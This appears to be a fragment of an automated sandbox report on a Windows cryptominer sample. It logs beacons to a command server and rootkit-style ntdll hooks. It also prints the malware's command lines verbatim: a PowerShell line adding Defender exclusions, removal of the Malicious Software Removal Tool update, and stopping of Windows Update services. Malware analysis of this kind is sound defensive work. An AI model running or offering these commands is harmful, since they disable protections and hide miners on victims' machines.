                                                        2024-10-10 02:56:11 UTC15377INData Raw: 36 64 30 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67
                                                        Data Ascii: 6d09<!doctype html><html lang="en" class="h-100"><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="content-languag
                                                        2024-10-10 02:56:11 UTC12549INData Raw: 64 6a 45 67 61 43 30 78 57 69 42 4e 4d 79 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 30 49 44 49 34 49 47 67 78 49 48 59 78 49 47 67 74 4d 56 6f 67 54 54 55 67 4d 6a 67 67 61 44 45 67 64 6a 45 67 61 43 30 78 57 69 42 4e 4e 69 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 33 49 44 49 34 49 47 67 78 49 48 59 78 49 47 67 74 4d 56 6f 67 54 54 67 67 4d 6a 67 67 61 44 45 67 64 6a 45 67 61 43 30 78 57 69 42 4e 4f 53 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 78 4d 43 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 78 4d 53 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 78 4d 69 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 43 6b 30 78 4d 79 41 79 4f 43 42 6f 4d 53 42
                                                        Data Ascii: djEgaC0xWiBNMyAyOCBoMSB2MSBoLTFaIE00IDI4IGgxIHYxIGgtMVogTTUgMjggaDEgdjEgaC0xWiBNNiAyOCBoMSB2MSBoLTFaIE03IDI4IGgxIHYxIGgtMVogTTggMjggaDEgdjEgaC0xWiBNOSAyOCBoMSB2MSBoLTFaIE0xMCAyOCBoMSB2MSBoLTFaIE0xMSAyOCBoMSB2MSBoLTFaIE0xMiAyOCBoMSB2MSBoLTFaCk0xMyAyOCBoMSB


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.649754172.67.19.244432248C:\Windows\System32\dialer.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:56:12 UTC114OUTGET /raw/sFxN07Y7 HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Host: pastebin.com
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:12 UTC388INHTTP/1.1 200 OK
                                                        Date: Thu, 10 Oct 2024 02:56:12 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-frame-options: DENY
                                                        x-content-type-options: nosniff
                                                        x-xss-protection: 1;mode=block
                                                        cache-control: public, max-age=1801
                                                        CF-Cache-Status: MISS
                                                        Last-Modified: Thu, 10 Oct 2024 02:56:12 GMT
                                                        Server: cloudflare
                                                        CF-RAY: 8d0355fd5d7019df-EWR
                                                        2024-10-10 02:56:12 UTC15INData Raw: 61 0d 0a 72 65 62 6f 72 6e 20 78 6d 72 0d 0a
                                                        Data Ascii: areborn xmr
                                                        2024-10-10 02:56:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.649760188.114.97.34432248C:\Windows\System32\dialer.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:56:13 UTC212OUTPOST /api/endpoint.php HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Content-Length: 374
                                                        Content-Type: application/json
                                                        Host: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:13 UTC374OUTData Raw: 7b 22 69 64 22 3a 22 61 79 6d 68 64 61 6b 71 79 74 76 63 65 69 77 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 34 35 37 37 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 5a 38 42 50 53 45 33 4f 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 35 61 70 66 39 38 6f 73 2f 72 61 77 2c 68 74 74 70 73 3a 2f 2f 6a 75 73 74 70 61 73 74 65 2e 69 74 2f 66 38 36 76 31 2c 68 74 74 70 73 3a 2f
                                                        Data Ascii: {"id":"aymhdakqytvceiwv","computername":"745773","username":"SYSTEM","gpu":"Z8BPSE3OH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://rentry.co/5apf98os/raw,https://justpaste.it/f86v1,https:/
                                                        2024-10-10 02:56:13 UTC626INHTTP/1.1 405 Not Allowed
                                                        Date: Thu, 10 Oct 2024 02:56:13 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwXhoj%2Bke1XFqXFELImOO7%2F30n%2BgQoHEXqFV%2BewEuKQ5lYpNYYL%2F7eu7qcdx6R4ttK%2Fr2NOKntkJ1jSQi0V%2F3eL7LN30E%2B9WlZ2USFiOVhKB%2F8lKYRDFO6IzoAvM7THaCaXuUnN7RU3cl65cKPZ52ajbENh2Xbi2AyJiVtD3Jr3A4AZQMKkz"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d03560489730f65-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-10 02:56:13 UTC163INData Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                        2024-10-10 02:56:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.665331188.114.97.34432248C:\Windows\System32\dialer.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:57:07 UTC212OUTPOST /api/endpoint.php HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Content-Length: 595
                                                        Content-Type: application/json
                                                        Host: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:57:07 UTC595OUTData Raw: 7b 22 69 64 22 3a 22 61 79 6d 68 64 61 6b 71 79 74 76 63 65 69 77 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 34 35 37 37 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 5a 38 42 50 53 45 33 4f 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 35 61 70 66 39 38 6f 73 2f 72 61 77 2c 68 74 74 70 73 3a 2f 2f 6a 75 73 74 70 61 73 74 65 2e 69 74 2f 66 38 36 76 31 2c 68 74 74 70 73 3a 2f
                                                        Data Ascii: {"id":"aymhdakqytvceiwv","computername":"745773","username":"SYSTEM","gpu":"Z8BPSE3OH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://rentry.co/5apf98os/raw,https://justpaste.it/f86v1,https:/
                                                        2024-10-10 02:57:08 UTC624INHTTP/1.1 405 Not Allowed
                                                        Date: Thu, 10 Oct 2024 02:57:08 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZvUmHtEtanfA3fmmeqr5Yjgaq4acZ1vBplSwP%2FoxwaEJbtvcRMaAbgMonrfwOEAOGBjDWSbWOy0%2BwgFZKSjsp1W%2BmWhdNr%2BQji7jBtv3o%2Fgwu6VxGywegWw%2F5XUEObjjCq2Hjar5npj56895jeyU%2FUB%2FqcVi2txUNAzAjSO0sfCJJ0QjwzS"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d03575968d44390-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-10 02:57:08 UTC163INData Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                        2024-10-10 02:57:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.665333188.114.97.3443
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:58:14 UTC212OUTPOST /api/endpoint.php HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Content-Length: 582
                                                        Content-Type: application/json
                                                        Host: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:58:14 UTC582OUTData Raw: 7b 22 69 64 22 3a 22 61 79 6d 68 64 61 6b 71 79 74 76 63 65 69 77 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 34 35 37 37 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 5a 38 42 50 53 45 33 4f 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 35 61 70 66 39 38 6f 73 2f 72 61 77 2c 68 74 74 70 73 3a 2f 2f 6a 75 73 74 70 61 73 74 65 2e 69 74 2f 66 38 36 76 31 2c 68 74 74 70 73 3a 2f
                                                        Data Ascii: {"id":"aymhdakqytvceiwv","computername":"745773","username":"SYSTEM","gpu":"Z8BPSE3OH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://rentry.co/5apf98os/raw,https://justpaste.it/f86v1,https:/
                                                        2024-10-10 02:58:14 UTC614INHTTP/1.1 405 Not Allowed
                                                        Date: Thu, 10 Oct 2024 02:58:14 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1S7GJRSQ5DQRD7mcfSrKY6SGLG8fqygXvbaAtbEerkbfVplfd2%2BBWQSndHWxprFx4hS8F9PYhKiu43jgbVRMnM1dLr5uVGs62rKYeA0jveLA0TmIEiEqLBndsEby1zuuvf%2BHKcBbm1QvcClMOhRCW3xPnlNTqBltkirUc9l7YsqmeTLtCB%2F"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d0358f7de1443e9-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-10 02:58:14 UTC163INData Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                        2024-10-10 02:58:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Code Manipulations

                                                        User Modules

                                                        Hook Summary

                                                        Function NameHook TypeActive in Processes
                                                        ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                        NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                        ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                        NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                        ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                        NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                        NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                        ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                        ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                        NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                        RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                        NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                        NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                        ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                        ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                        Processes

                                                        Process: winlogon.exe, Module: ntdll.dll
                                                        Function NameHook TypeNew Data
                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        Process: explorer.exe, Module: ntdll.dll
                                                        Function NameHook TypeNew Data
                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:22:55:57
                                                        Start date:09/10/2024
                                                        Path:C:\Users\user\Desktop\egFMhHSlmf.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\egFMhHSlmf.exe"
                                                        Imagebase:0x7ff687bc0000
                                                        File size:5'536'856 bytes
                                                        MD5 hash:1417D38C40D85D1C4EB7FAD3444CA069
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:22:55:57
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:22:55:57
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff70b4f0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\wusa.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff7c7170000
                                                        File size:345'088 bytes
                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

